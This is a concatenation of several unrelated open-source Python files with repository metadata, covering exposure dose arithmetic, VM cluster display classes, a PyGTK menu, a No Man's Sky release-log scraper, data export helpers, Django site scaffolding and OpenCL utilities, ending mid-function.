saliva_extraction_factor = 0.48
for lifestage in ['1_to_2']:
try:
exposure = surface_residue_concentration * daily_material_to_skin_transfer_efficency * fraction_of_hand_mouthed * hand_surface_area * replenishment_intervals * exposure_time
exposure *= (1. - ((1.-saliva_extraction_factor)**(hand_to_mouth_event_freqency/replenishment_intervals)))
        except Exception:
            exposure = "Invalid"
exposure_profile.update('oral','paint','',lifestage, exposure)
return exposure_profile
def test():
pass
#
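# A worked sketch of the hand-to-mouth dose arithmetic above, using
# illustrative inputs (these numbers are assumptions, not values
# prescribed by the SOP):
def _example_hand_to_mouth_dose():
    surface_residue_concentration = 0.5   # assumed residue per unit area
    daily_material_to_skin_transfer_efficency = 0.06  # assumed
    fraction_of_hand_mouthed = 0.13
    hand_surface_area = 150.
    replenishment_intervals = 4.
    saliva_extraction_factor = 0.48
    exposure_time = 2.                    # assumed hours of exposure
    hand_to_mouth_event_freqency = 13.9   # indoor value noted above
    exposure = (surface_residue_concentration
                * daily_material_to_skin_transfer_efficency
                * fraction_of_hand_mouthed * hand_surface_area
                * replenishment_intervals * exposure_time)
    exposure *= (1. - (1. - saliva_extraction_factor)
                 ** (hand_to_mouth_event_freqency / replenishment_intervals))
    return exposure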
|
agpl-3.0
| 3,519,419,388,005,567,500 | 40.083333 | 211 | 0.688979 | false |
hopecream/vclusterBooter
|
src/lib/vmResult.py
|
1
|
3393
|
# Use this class to return the command
# execution results
class vmCommandResult:
def __init__(self):
self.retCode = 0
self.msg = ""
self.clusters = []
class vClusterInstance:
def __init__(self):
self.id = 0
self.vmNR = 0
# network format (public/private, name, ip, id)
self.networks = []
self.vmInstances = []
def __str__(self):
str = ""
str += "=================================================================================\n"
str += "vClusterID\t# of VM\t\n"
str += "---------------------------------------------------------------------------------\n"
str += "%d\t\t%d\n" % (int(self.id), int(self.vmNR))
str += "---------------------------------------------------------------------------------\n"
str += "Networks: \n"
str += "---------------------------------------------------------------------------------\n"
str += "ID\tName\t\tType\tMode\tIP \n"
for network in self.networks:
str += "%d\t%s\t%s\t%s\t%s\n" % \
(int(network.id), network.name[:15], network.type,\
network.mode, network.IP)
str += "\n"
str += "---------------------------------------------------------------------------------\n"
str += "Virtual Machines:\n"
str += "---------------------------------------------------------------------------------\n"
str += "ID\tName\t\tMemory(MB)\tStatus\tNetworks\t\tIP\tDisks\n"
str += "---------------------------------------------------------------------------------\n"
for vminst in self.vmInstances:
str += "%d\t%s\t\t%d\t%s\t" % (int(vminst.id), \
vminst.name[:15], int(vminst.memSize), vminst.status[:7])
spaceShift = "\t" * 6
maxLoop = max(len(vminst.networkName), len(vminst.disks), len(vminst.ips))
for i in range(maxLoop):
if i > 0:
str += spaceShift
if i < len(vminst.networkName):
network = vminst.networkName[i]
str += "%s\t" % (network[:15], )
else:
str += "\t" * 2
if i < len(vminst.ips):
ip = vminst.ips[i]
str += "%s\t" % (ip,)
else:
str += "\t" * 2
if i < len(vminst.disks):
disk = vminst.disks[i]
str += "%s\t" % (disk[:7], )
else:
str += "\t" * 2
str += "\n"
str += "=================================================================================\n"
return str
class vmInstance:
def __init__(self):
self.name = ""
self.status = "N/A"
self.id = 0
self.memSize = 0
self.networkName = []
self.ips = []
self.disks = []
class vNetInstance:
def __init__(self):
self.id = 0
self.name = ""
self.type = ""
self.mode = ""
self.IP = ""
# Prevent anything from running when the module is executed directly
if __name__ == '__main__':
pass
|
lgpl-3.0
| -8,133,564,602,829,689,000 | 32.594059 | 100 | 0.319481 | false |
flackr/quickopen
|
src/open_dialog_test.py
|
2
|
1664
|
# Copyright 2011 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import db_test_base
import open_dialog
import os
import message_loop
import tempfile
import temporary_daemon
import ui_test_case
# Special indicator to TestRunner to only let us run when
# run_unit_tests is passed -m from the commandline.
requires_manual_handling = True
class FakeOptions(object):
def __init__(self, test_data_dir):
self.ok = True
self.lisp_results = False
self.results_file = None
self.current_filename = os.path.join(test_data_dir, "project1/foo.txt")
self.open_filenames = [os.path.join(test_data_dir, "project1/foo.txt")]
class OpenDialogTest(ui_test_case.UITestCase):
def setUp(self):
self.db_test_base = db_test_base.DBTestBase()
self.db_test_base.setUp()
self.daemon = temporary_daemon.TemporaryDaemon()
self.db = self.daemon.db_proxy
self.db.add_dir(self.db_test_base.test_data_dir)
self.options = FakeOptions(self.db_test_base.test_data_dir)
def tearDown(self):
self.daemon.close()
self.db_test_base.tearDown()
def test_open_dialog(self):
x = open_dialog.OpenDialog(self.options, self.db, "")
|
apache-2.0
| 6,669,859,397,826,754,000 | 33.666667 | 75 | 0.731971 | false |
BennehR/BennehBot
|
V3/UF_NoMansSky.py
|
1
|
3053
|
import asyncio
import datetime
import urllib.request
import requests
import sqlite3 as lite
from bs4 import BeautifulSoup
import json
NMSVers = []
def printMsg(msg):
print("UF_NMS: " + str(msg))
def get_url(url):
response = requests.get(url)
content = response.content.decode("utf8")
return content
def TelegramUpdate(updateInfo, JSONData):
for token in JSONData["Tokens"]["Telegram"]["ChatID"]:
url = "https://api.telegram.org/bot{}/sendMessage?chat_id={}&text={}".format(JSONData["Tokens"]["Telegram"]["BotToken"], next(iter(token.keys())), updateInfo)
printMsg(url)
get_url(url)
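# Shape of config.json implied by the lookups above (illustrative values):
# {
#     "Tokens": {
#         "Telegram": {
#             "BotToken": "<bot token from @BotFather>",
#             "ChatID": [{"-1001234567890": "example channel"}]
#         }
#     }
# }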
async def NMSVerListSetup():
NMSVers.clear()
printMsg('Refreshing version list')
try:
con = lite.connect('BennehBotDB.db')
cur = con.cursor()
cur.execute("SELECT PatchName FROM NMS_Versions")
i = 0
for versions in cur:
NMSVers.append(versions[0])
except lite.Error as e:
        return('Unhandled database error\n' + str(e))
finally:
con.close()
async def NMSVersionCheck():
while True:
with open('config.json') as json_data:
JSONConfig = json.load(json_data)
await NMSVerListSetup()
printMsg('List updated')
UrlHeader = 'https://www.nomanssky.com/'
page = requests.get('https://www.nomanssky.com/release-log/')
data = page.text
soup = BeautifulSoup(data, 'html.parser')
updateEntries = soup.find_all('a', {"class" : "link link--inherit"})
i = 0
for entry in updateEntries:
updateText = entry.find("h2", recursive=True)
updateText = updateText.text
updateURL = entry.attrs['href']
            # If the URL is relative (no scheme), prefix it with the site root
if "http" not in updateURL:
updateURL = UrlHeader + updateURL[1:]
dateStamp = str(datetime.datetime.now())
if updateText not in NMSVers:
printMsg('New entry')
updateInfo = updateText + " - " + updateURL + " - " + dateStamp
printMsg(updateInfo)
TelegramUpdate(updateInfo, JSONConfig)
try:
printMsg('Connecting...')
con = lite.connect('BennehBotDB.db')
printMsg('Connected!')
cur = con.cursor()
printMsg('Adding to DB...')
cur.execute("INSERT INTO NMS_Versions VALUES(?,?,?)", (updateText, updateURL, dateStamp))
printMsg('Committing...')
con.commit()
printMsg('Entry added to DB')
                except lite.Error as e:
                    # Handle the specific sqlite error first; with the broad
                    # Exception clause first, this branch was unreachable,
                    # and e.message does not exist in Python 3.
                    return('Unhandled database error\n' + str(e))
                except Exception as e:
                    return('Unhandled connection error\n' + str(e))
finally:
con.close()
printMsg('UF_NMS done.')
await asyncio.sleep(900)
|
mit
| -7,510,132,966,384,543,000 | 32.56044 | 166 | 0.562398 | false |
dmccloskey/io_utilities
|
io_utilities/base_exportData.py
|
1
|
3964
|
import csv, sys, json, io
#System dependencies (write_binaryFile)
import shutil
#System dependencies (compressed files)
import zipfile, gzip, bz2, tarfile
class base_exportData():
"""a class to export data"""
def __init__(self,data_I=[]):
if data_I: self.add_data(data_I);
else: self.data = [];
def add_data(self,data_I):
"""add data"""
self.data = data_I;
def clear_data(self):
"""clear existing data"""
#del self.data[:];
self.data = None;
def write_dict2csv(self,filename,headers=None):
# write dict to csv
with open(filename, 'w',newline='') as f:
if headers: fieldname = headers;
else: fieldname = list(self.data[0].keys())
writer = csv.DictWriter(f, fieldnames = fieldname)
try:
writer.writeheader();
writer.writerows(self.data);
except csv.Error as e:
sys.exit(e);
def write_dict2json(self,filename):
# write dict to json file
with open(filename, 'w',newline='') as outfile:
json.dump(self.data, outfile, indent=4);
def write_dict2tsv(self,filename):
# write dict to tsv
with open(filename, 'w',newline='') as f:
writer = csv.DictWriter(f,fieldnames = list(self.data[0].keys()),dialect = 'excel-tab')
try:
writer.writeheader();
writer.writerows(self.data);
except csv.Error as e:
sys.exit(e);
def write_headerAndColumnsAndElements2csv(self,header_I,columns_I,filename):
# make header
header = [''];
header.extend(header_I);
# make rows
rows = self.data;
for i in range(len(columns_I)):
rows[i].insert(0,columns_I[i]);
with open(filename, 'w',newline='') as f:
writer = csv.writer(f);
try:
writer.writerow(header);
writer.writerows(rows);
except csv.Error as e:
sys.exit(e);
def write_headersAndElements2csv(self,header_I,filename):
# write data to csv file
with open(filename, 'w',newline='') as f:
writer = csv.writer(f);
try:
writer.writerows(header_I);
writer.writerows(self.data);
except csv.Error as e:
sys.exit(e);
def write_headersAndElements2txt(self,header_I,filename):
# write data to txt file
with open(filename, 'w',newline='') as f:
writer = csv.writer(f, delimiter='\t');
try:
writer.writerows(header_I);
writer.writerows(self.data);
except csv.Error as e:
sys.exit(e);
def write_dict2js(self,filename,varname):
# write dict to js file
json_str = 'var ' + varname + ' = ' + json.dumps(self.data);
with open(filename,'w') as file:
file.write(json_str);
def write_binaryFile(self,filename,length=131072):
'''Write a binary file stream to disk
INPUT:
filename = string
self.data = binary file stream
length = chunks of memory to write to disk
'''
##write from the start of the file
#file.seek(0)
if type(self.data)==type(b''):
data = io.BytesIO(self.data)
elif type(self.data)==type(io.BytesIO()):
data = self.data;
with open(filename,mode='wb') as f:
shutil.copyfileobj(data, f, length=length)
def write_binary2gz(self,filename,length=131072):
'''Write a binary file stream to disk in gz compression
INPUT:
filename = string
self.data = binary file stream
length = chunks of memory to write to disk
'''
with gzip.open(filename, 'wb') as f:
shutil.copyfileobj(self.data, f, length=length)
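# A minimal usage sketch (illustrative, not part of the original module):
# rows = [{'id': 1, 'name': 'a'}, {'id': 2, 'name': 'b'}]
# exporter = base_exportData(rows)
# exporter.write_dict2csv('rows.csv')        # columns taken from dict keys
# exporter.write_dict2json('rows.json')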
|
mit
| 1,311,515,058,507,463,700 | 32.863248 | 99 | 0.549218 | false |
Programmica/pygtk-tutorial
|
examples/applicationmenu.py
|
1
|
1388
|
#!/usr/bin/env python
import gtk
class ApplicationMenu(gtk.Window):
def __init__(self):
gtk.Window.__init__(self)
self.set_title("Application Menu")
self.connect("destroy", gtk.main_quit)
        menubar = gtk.MenuBar()
        self.add(menubar)
menuitemFile = gtk.MenuItem("File")
menubar.append(menuitemFile)
menuFile = gtk.Menu()
menuitemFile.set_submenu(menuFile)
menuitemOpen = gtk.MenuItem("Open")
menuFile.append(menuitemOpen)
menuitemSave = gtk.MenuItem("Save")
menuFile.append(menuitemSave)
menuitemQuit = gtk.MenuItem("Quit")
menuFile.append(menuitemQuit)
menuitemEdit = gtk.MenuItem("Edit")
menubar.append(menuitemEdit)
menuEdit = gtk.Menu()
menuitemEdit.set_submenu(menuEdit)
menuitemCut = gtk.MenuItem("Cut")
menuEdit.append(menuitemCut)
menuitemCopy = gtk.MenuItem("Copy")
menuEdit.append(menuitemCopy)
menuitemPaste = gtk.MenuItem("Paste")
        menuEdit.append(menuitemPaste)
menuitemHelp = gtk.MenuItem("Help")
menubar.append(menuitemHelp)
menuHelp = gtk.Menu()
menuitemHelp.set_submenu(menuHelp)
menuitemAbout = gtk.MenuItem("About")
menuHelp.append(menuitemAbout)
window = ApplicationMenu()
window.show_all()
gtk.main()
|
cc0-1.0
| 5,636,652,511,959,924,000 | 25.692308 | 46 | 0.633285 | false |
marteki/retirement
|
setup.py
|
1
|
2087
|
import os
from setuptools import setup, find_packages
from subprocess import call
from setuptools import Command
from distutils.command.build_ext import build_ext as _build_ext
from setuptools.command.bdist_egg import bdist_egg as _bdist_egg
def read_file(filename):
"""Read a file into a string"""
path = os.path.abspath(os.path.dirname(__file__))
filepath = os.path.join(path, filename)
try:
return open(filepath).read()
except IOError:
return ''
class build_frontend(Command):
""" A command class to run `frontendbuild.sh` """
description = 'build front-end JavaScript and CSS'
user_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
        print(__file__)
call(['./frontendbuild.sh'],
cwd=os.path.dirname(os.path.abspath(__file__)))
class build_ext(_build_ext):
""" A build_ext subclass that adds build_frontend """
def run(self):
self.run_command('build_frontend')
_build_ext.run(self)
class bdist_egg(_bdist_egg):
""" A bdist_egg subclass that runs build_frontend """
def run(self):
self.run_command('build_frontend')
_bdist_egg.run(self)
setup(
name='retirement',
version='0.4.52',
author='CFPB',
author_email='tech@cfpb.gov',
maintainer='cfpb',
maintainer_email='tech@cfpb.gov',
packages=['retirement_api'],
include_package_data=True,
description=u'Retirement app and api',
classifiers=[
'Topic :: Internet :: WWW/HTTP',
'Intended Audience :: Developers',
'Programming Language :: Python',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Framework :: Django',
'Development Status :: 4 - Beta',
'Operating System :: OS Independent',
],
long_description=read_file('README.md'),
zip_safe=False,
cmdclass={
'build_frontend': build_frontend,
'build_ext': build_ext,
'bdist_egg': bdist_egg,
},
)
|
cc0-1.0
| -7,705,016,357,430,789,000 | 26.460526 | 64 | 0.618112 | false |
amboycharlie/Child-Friendly-LCMS
|
leonardo/module/web/utils/scaffold_web.py
|
1
|
6833
|
import logging
import os
import requests
import six
from django.conf import settings
from django.contrib.auth import authenticate, login
from django.contrib.auth.models import User
from horizon_contrib.common import get_class
from ..models import (Page, PageColorScheme, PageTheme, WidgetBaseTheme,
WidgetContentTheme, WidgetDimension)
LOG = logging.getLogger('leonardo')
LEONARDO_BOOTSTRAP_DIR = getattr(settings, 'LEONARDO_BOOTSTRAP_DIR', None)
def _load_from_stream(stream):
result = None
try:
import yaml
result = yaml.load(stream)
    except Exception:
pass
else:
return result
try:
import json
result = json.load(stream)
    except Exception:
pass
else:
return result
return result
def get_loaded_scripts(directory=LEONARDO_BOOTSTRAP_DIR):
"""return dictionary of loaded scripts from specified directory
"""
scripts = {}
if not directory:
raise Exception("You must set LEONARDO_BOOTSTRAP_DIR"
" absolute path to bootstrap scripts")
for root, dirnames, filenames in os.walk(directory):
for file_name in filenames:
try:
ext = file_name.split('.')[1]
with open(os.path.join(directory, file_name), 'r') as file:
scripts[file_name] = _load_from_stream(file)
except Exception as e:
                LOG.exception('Error while loading file {}: {}'.format(
file_name, str(e)))
return scripts
def _handle_regions(regions, feincms_object):
for region, widgets in six.iteritems(regions):
for widget_cls, widget_attrs in six.iteritems(widgets):
try:
WidgetCls = get_class(widget_cls)
except Exception as e:
                raise Exception('Cannot load {} with {}'.format(
widget_cls, e))
# TODO create form and validate options
w_attrs = widget_attrs.get('attrs', {})
w_attrs.update({
'parent': feincms_object,
'region': region,
'ordering': 0
})
w_attrs['content_theme'] = WidgetContentTheme.objects.get(
name=w_attrs['content_theme'],
widget_class=WidgetCls.__name__)
w_attrs['base_theme'] = WidgetBaseTheme.objects.get(
name=w_attrs['base_theme'])
widget = WidgetCls(**w_attrs)
widget.save(created=False)
for size, width in six.iteritems(
widget_attrs.get('dimenssions', {})):
WidgetDimension(**{
'widget_id': widget.pk,
'widget_type': widget.content_type,
'size': size,
'width': width
}).save()
def create_new_site(run_syncall=False, with_user=True, request=None,
name='demo.yaml', url=None):
"""load all available scripts and try scaffold new site from them
TODO(majklk): refactor and support for more cases
"""
if run_syncall:
from django.core import management
management.call_command('sync_all', force=True)
if url:
try:
BOOTSTRAP = _load_from_stream(requests.get(url).text)
except Exception as e:
raise e
else:
try:
scripts = get_loaded_scripts()
BOOTSTRAP = scripts[name]
except KeyError:
raise Exception('Cannot find {} in {} loaded from {}'.format(
name, scripts, LEONARDO_BOOTSTRAP_DIR))
root_page = None
for username, user_attrs in six.iteritems(BOOTSTRAP.pop('auth.User', {})):
# create and login user
if with_user and not User.objects.exists():
User.objects.create_superuser(
username, user_attrs['mail'], user_attrs['password'])
# login
if request:
auth_user = authenticate(
username=username, password=user_attrs['password'])
login(request, auth_user)
for page_name, page_attrs in six.iteritems(BOOTSTRAP.pop('web.Page', {})):
page_theme_name = page_attrs.pop('theme', '__first__')
page_color_scheme_name = page_attrs.pop('color_scheme', '__first__')
regions = page_attrs.pop('content', {})
if not (PageTheme.objects.exists() or
PageColorScheme.objects.exists()):
raise Exception("You havent any themes \
please install someone and run sync_all")
try:
if page_theme_name == '__first__':
theme = PageTheme.objects.first()
else:
theme = PageTheme.objects.get(name=page_theme_name)
except PageTheme.DoesNotExist:
raise Exception(
"Page theme %s not found" % page_theme_name)
except Exception as e:
            raise Exception(
                "Found more than one PageTheme matching %s" % page_theme_name)
else:
page_attrs['theme'] = theme
try:
if page_color_scheme_name == '__first__':
color_scheme = PageColorScheme.objects.first()
else:
color_scheme = PageColorScheme.objects.get(
name__icontains=page_color_scheme_name)
except PageColorScheme.DoesNotExist:
raise Exception("Page Color Scheme %s "
"not found" % page_color_scheme_name)
else:
page_attrs['color_scheme'] = color_scheme
page, created = Page.objects.get_or_create(**page_attrs)
# TODO from attrs etc..
root_page = page
_handle_regions(regions, page)
# generic stuff
for cls_name, entries in six.iteritems(BOOTSTRAP):
for entry, cls_attrs in six.iteritems(entries):
cls = get_class(cls_name)
regions = cls_attrs.pop('content', {})
# load FK from
# author: {'pk': 1, 'type': 'auth.User'}
for attr, value in six.iteritems(cls_attrs):
if isinstance(value, dict):
cls_type = value.get('type', None)
if cls_type:
try:
cls_attrs[attr] = get_class(
cls_type).objects.get(pk=value.get('pk'))
except Exception as e:
                            raise Exception(
                                'Cannot load FK {}: not found; original exception {}'.format(cls_type, e))
instance, created = cls.objects.get_or_create(**cls_attrs)
_handle_regions(regions, instance)
return root_page
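# Illustrative shape of a bootstrap script consumed by create_new_site
# (an assumed example; the widget class path is hypothetical):
#
# auth.User:
#   admin:
#     mail: admin@example.com
#     password: secret
# web.Page:
#   homepage:
#     title: Home
#     theme: __first__
#     color_scheme: __first__
#     content:
#       main:
#         leonardo.module.web.models.ExampleWidget:
#           attrs:
#             content_theme: default
#             base_theme: default
#           dimenssions:   # key spelling matches the lookup in the code
#             xs: 12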
|
apache-2.0
| -4,611,583,708,445,378,000 | 30.344037 | 104 | 0.547197 | false |
j-faria/OPEN
|
OPEN/test/test_ext.py
|
1
|
1396
|
# -*- coding: utf-8 -*-
#
# Copyright (c) 2013 João Faria
# This file is part of OPEN which is licensed under the MIT license.
# You should have received a copy of the license along with OPEN. See LICENSE.
#
from numpy import linspace, zeros_like, ones_like, savetxt
import difflib
def test_periodogram_ext():
""" Test extensions related to periodograms """
try:
from ..ext import blombscargle
    except ImportError as e:
raise e
def test_rv_ext():
""" Test extensions related to building rv curves """
# test imports
try:
from ..ext.get_rvN import get_rvn
from ..ext.get_rv import get_rv
from ..ext.get_rvN_MultiSite import get_rvn as get_rvn_ms
    except ImportError as e:
raise e
times = linspace(2449460, 2452860, 100)
vel1 = zeros_like(times)
vel2 = zeros_like(times)
vel3 = zeros_like(times)
get_rv(times, 1425, 10, 0.9, 0.2, 2452000, vel1)
get_rvn(times, [1425, 13], [10, 3], [0.9, 0.02], [0.2, 0.3], [2452000, 2451000], 0., vel2)
observ = ones_like(times)
observ[50:] = 2
get_rvn_ms(times, [1425, 13], [10, 3], [0.9, 0.02], [0.2, 0.3], [2452000, 2451000], [0., 10.], observ, vel3)
    savetxt('out_test.txt', list(zip(times, vel1, vel2)))
f1 = open('out_normal.txt')
f2 = open('out_test.txt')
diff = difflib.SequenceMatcher(None, f1.read(), f2.read())
assert diff.ratio() == 1., 'Non-normal RV curve building: something is wrong with get_rv or get_rvn extensions'
|
mit
| 2,562,638,030,816,605,700 | 29.347826 | 112 | 0.671685 | false |
wh20160213/WuhuaLearnToPython
|
python_study_level1/package1/study9_class.py
|
1
|
2025
|
# Class definition
class people:
    # Define basic attributes
    name = ''
    age = 0
    # Define a private attribute; private attributes cannot be accessed
    # directly from outside the class
    __weight = 0
    # Define the constructor
    def __init__(self,n,a,w):
        self.name = n
        self.age = a
        self.__weight = w
    def speak(self):
        print("%s says: I am %d years old." % (self.name, self.age))
# Single inheritance example
class student(people):
    grade = ''
    def __init__(self,n,a,w,g):
        # Call the parent class constructor
        people.__init__(self,n,a,w)
        self.grade = g
    # Override the parent class method
    def speak(self):
        print("%s says: I am %d years old and in grade %d" % (self.name, self.age, self.grade))
# Another class, in preparation for multiple inheritance
class speaker():
    topic = ''
    name = ''
    def __init__(self,n,t):
        self.name = n
        self.topic = t
    def speak(self):
        print("My name is %s; I am a speaker and my speech topic is %s" % (self.name, self.topic))
# Multiple inheritance
class sample(speaker,student):
    a = ''
    def __init__(self,n,a,w,g,t):
        student.__init__(self,n,a,w,g)
        speaker.__init__(self,n,t)
test = sample("Tim",25,80,4,"Python")
print('######### With identical method names, the method of the first parent class in the parentheses is called by default')
test.speak()
class Parent:  # Define the parent class
    def myMethod(self):
        print('Calling the parent class method')
class Child(Parent):  # Define the child class
    def myMethod(self):
        print('Calling the child class method')
c = Child()  # Child class instance
print("####### Python has no separate notion of references; whichever class is instantiated, that class's methods are used")
c.myMethod()  # Child instance calls the overridden method
class PrivatePublic:
    def pubFun(self):
        print('this is pub')
    def __priFun(self):
        print('private only')
    pubAttr = 0
    privateAttr = -1
testpp = PrivatePublic()
testpp.pubFun()
print(testpp.pubAttr)
#testpp.__priFun()
#print(testpp.privateAttr)
|
lgpl-3.0
| 4,749,050,523,058,294,000 | 19.855263 | 72 | 0.51776 | false |
sgaebel/GAPS
|
gaps/utilities.py
|
1
|
19295
|
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Assorted auxiliary functions.
These include (amongst other things) helper functions for creating
GPU buffers, compiling kernels, checking the availability of 64bit
floats, printing available devices and platform with detailed
information.
@author: Sebastian M. Gaebel
@email: sebastian.gaebel@ligo.org
"""
from .auxiliary_sources import basic_code
import numpy as np
import pyopencl as ocl
BUILD_OPTIONS = ['-cl-fp32-correctly-rounded-divide-sqrt',
'-Werror']
def digest_user_data(data, cdouble_t):
"""Ensures that user data is either None, a numpy array, or a
collection of numpy arrays. All array are converted to `cdouble`.
Additionally, the OpenCL code to be inserted in the function
signature is generated."""
if data is None:
user_data = []
func_name = ''
func_call = ''
return user_data, func_name, func_call
if isinstance(data, np.ndarray):
c_shape = ''.join('[{}]'.format(x) for x in data.shape)
user_data = [data.astype(cdouble_t)]
        func_name = 'user_data_0'
func_def = '__global const cdouble {}{}'.format(func_name, c_shape)
return user_data, ', '+func_name, ', '+func_def
if isinstance(data, (list, tuple)):
user_data = []
func_names = []
func_defs = []
for idx, element in enumerate(data):
converted = np.array(element, dtype=cdouble_t)
c_shape = ''.join('[{}]'.format(x) for x in converted.shape)
func_name = 'user_data_{}'.format(idx)
user_data.append(converted)
func_defs.append('__global const cdouble {}{}'.format(func_name,
c_shape))
func_names.append(func_name)
func_names = ', ' + (', '.join(func_names))
func_defs = ', ' + (', '.join(func_defs))
return user_data, func_names, func_defs
raise TypeError('User data type {!r} is not recognised.'
''.format(type(data)))
def create_read_buffer(context, host):
"""Shorthand for creating a read-only buffer on the GPU."""
# TODO: Figure out what exactly COPY_HOST_PTR does.
flags = ocl.mem_flags.READ_ONLY | ocl.mem_flags.COPY_HOST_PTR
return ocl.Buffer(context, flags, hostbuf=host)
def create_write_buffer(context, host):
"""Shorthand for creating a write-only buffer on the GPU."""
return ocl.Buffer(context, ocl.mem_flags.WRITE_ONLY, host.nbytes)
def cdouble(queue):
"""Helper which checks if 'fp64' is mentioned in the extensions of
the device associated with the given queue, i.e. if support for
for 64-bit floats is available."""
if 'fp64' in queue.device.get_info(ocl.device_info.EXTENSIONS):
return np.float64
else:
return np.float32
def cfloat(queue=None):
"""Currently, cfloat is always `np.float32`."""
return np.float32
def cshort(queue=None):
"""Currently, cshort is always `np.float16`."""
return np.float16
def compile_kernel(context, queue, source_code, function_name,
compiler_flags=None):
"""Compile the kernel given in `source_code` together with
the GAPS math definitions and functions, and cdouble definition.
Compiler flags can be given in addition to the default flags
defined in `utilities.py`."""
if cdouble(queue)(42).nbytes >= 8:
type_definitions = """
#define cdouble double
"""
else:
print('WARNING: no 64bit float support available for this device.')
type_definitions = """
#define cdouble float
"""
# The definition of cfloat and cshort is fixed for now since I do
# not know of any cases where these are not available. If this
# happens to be the case, we can add a check as for double here.
type_definitions += """
#define cfloat float
#define cshort short
"""
flags = BUILD_OPTIONS[:]
if compiler_flags is not None:
flags.extend(compiler_flags)
full_source = type_definitions + basic_code() + source_code
program = ocl.Program(context, full_source).build(flags)
return getattr(program, function_name)
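# Example (sketch, illustrative only): compiling a trivial kernel that
# doubles each element in place, given a context and queue such as those
# returned by create_context_and_queue() below.
#
#     source = '''
#     __kernel void scale(__global cdouble *data) {
#         data[get_global_id(0)] *= (cdouble) 2;
#     }
#     '''
#     scale = compile_kernel(context, queue, source, 'scale')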
def create_context_and_queue(platform_idx=None, device_idx=None):
"""
Convenience function to create the OpenCL context and queue needed
to create buffers and create and call kernels.
Parameters
----------
platform_idx : int or None
device_idx : int or None
Indices of the chosen OpenCL platform and device on that
platform. If both are None the device is chosen via
        `pyopencl.create_some_context()`. Default: None.
Returns
-------
context, queue : tuple
OpenCL context and the associated command queue.
Raises
------
    ValueError
        If no OpenCL platform or device is found.
    IndexError
        If `platform_idx` or `device_idx` is out of range.
"""
if platform_idx is None:
if device_idx is None:
context = ocl.create_some_context()
queue = ocl.CommandQueue(context)
return context, queue
platform_idx = 0
if device_idx is None:
device_idx = 0
available_platforms = ocl.get_platforms()
if len(available_platforms) < 1:
raise ValueError('No platform found.')
elif len(available_platforms) <= platform_idx:
raise IndexError('Index {} invalid for {} available platforms.'
''.format(platform_idx, len(available_platforms)))
platform = available_platforms[platform_idx]
available_devices = platform.get_devices()
if len(available_devices) < 1:
raise ValueError('No device found.')
elif len(available_devices) <= device_idx:
raise IndexError('Index {} invalid for {} available devices.'
''.format(device_idx, len(available_devices)))
device = available_devices[device_idx]
context = ocl.Context([device])
queue = ocl.CommandQueue(context)
return context, queue
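# Example (sketch): select the first device on the first platform; with
# both indices omitted, pyopencl chooses (possibly interactively).
#
#     context, queue = create_context_and_queue(0, 0)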
def memory_size(n_bytes, *, SI=False, template='{:.2f} {} ({} B)'):
"""Converting a number of bytes into human readable units.
Copied from `shed`.
Parameters
----------
n_bytes : int
Number of bytes.
    SI : bool
        If True, use SI units (base 1000); otherwise use binary units
        (base 1024). Keyword only argument. Default: False.
template : string
Template used to print the formatted memory size.
Default: '{:.2f} {} ({} B)'.
Returns
-------
value : string
Formatted string.
"""
if n_bytes < 0:
raise ValueError('Memory sizes may not be negative: {!r}'
''.format(n_bytes))
if SI:
units = ['B', 'kB', 'MB', 'GB', 'TB', 'PB', 'EB', 'ZB', 'YB']
base = 1000
else:
units = ['B', 'kiB', 'MiB', 'GiB', 'TiB', 'PiB', 'EiB', 'ZiB', 'YiB']
base = 1024
*units, final_unit = units
if n_bytes < base:
return '{:.0f} B'.format(n_bytes)
n_units = n_bytes
for unit in units:
if n_units < base:
break
n_units /= base
else:
unit = final_unit
return template.format(n_units, unit, n_bytes)
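# Examples (outputs follow from the implementation above):
#
#     >>> memory_size(1536)
#     '1.50 kiB (1536 B)'
#     >>> memory_size(1536, SI=True)
#     '1.54 kB (1536 B)'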
def device_limitations(device):
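    """Return a dict of the device's key memory and work group limits."""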
limitations = dict(
global_memory=device.get_info(ocl.device_info.GLOBAL_MEM_SIZE),
local_memory=device.get_info(ocl.device_info.LOCAL_MEM_SIZE),
constant_memory=device.get_info(ocl.device_info.MAX_CONSTANT_BUFFER_SIZE),
alloc_size=device.get_info(ocl.device_info.MAX_MEM_ALLOC_SIZE),
group_size=device.get_info(ocl.device_info.MAX_WORK_GROUP_SIZE))
return limitations
def compute_group_size(device, n_dim, cfloat_t):
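    """Estimate a work group size bounded by the device's local memory
    (assuming each work item needs 2*(n_dim+1) values of `cfloat_t`),
    capped at the device's maximum work group size."""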
local_avail = device_limitations(device)['local_memory']
max_group_size = local_avail / (2*(n_dim+1)*cfloat_t(1.0).nbytes)
ideal_group_size = 2**np.floor(np.log2(max_group_size))
if int(1.5*ideal_group_size) < max_group_size:
ideal_group_size = int(1.5*ideal_group_size)
if ideal_group_size > device_limitations(device)['group_size']:
ideal_group_size = device_limitations(device)['group_size']
return int(ideal_group_size)
def print_devices(detail_level=0):
"""
    Print all available platforms and devices, optionally with detailed
    device information.
Parameters
----------
    detail_level : int
        If >0, the function also prints device properties. Higher
        levels correspond to more (and less important) detail.
        A recommended level of detail for kernel design is 2-3.
        Maximum level is 5. Default: 0.
Returns
-------
None
Notes
-----
The (rough) guideline for the different levels of detail is:
* 0 Platform and device names only
* 1 Basic and essential
* 2 Impacts use strongly
* 3 Impacts use weakly
* 4 Fine detail
* 5 Rarely available, vendor specific, or deemed largely useless
"""
if detail_level < 0:
raise ValueError('Negative detail level: {!r}'.format(detail_level))
if detail_level < 1:
for platform_idx, platform in enumerate(ocl.get_platforms()):
print('Platform [{}]: {} ({})'.format(platform_idx, platform.name,
platform.version))
for device_idx, device in enumerate(platform.get_devices()):
print(' Device [{}]: {}'.format(device_idx, device.name))
            print()  # Additional line as separator for readability
return
# Specialised formatting functions for specific pieces of information.
# Device type macros (used for ocl.device_info.TYPE):
def device_type(info):
"""Translating the bit map into human readable categories."""
options = {(1 << 0): 'CL_DEVICE_TYPE_DEFAULT',
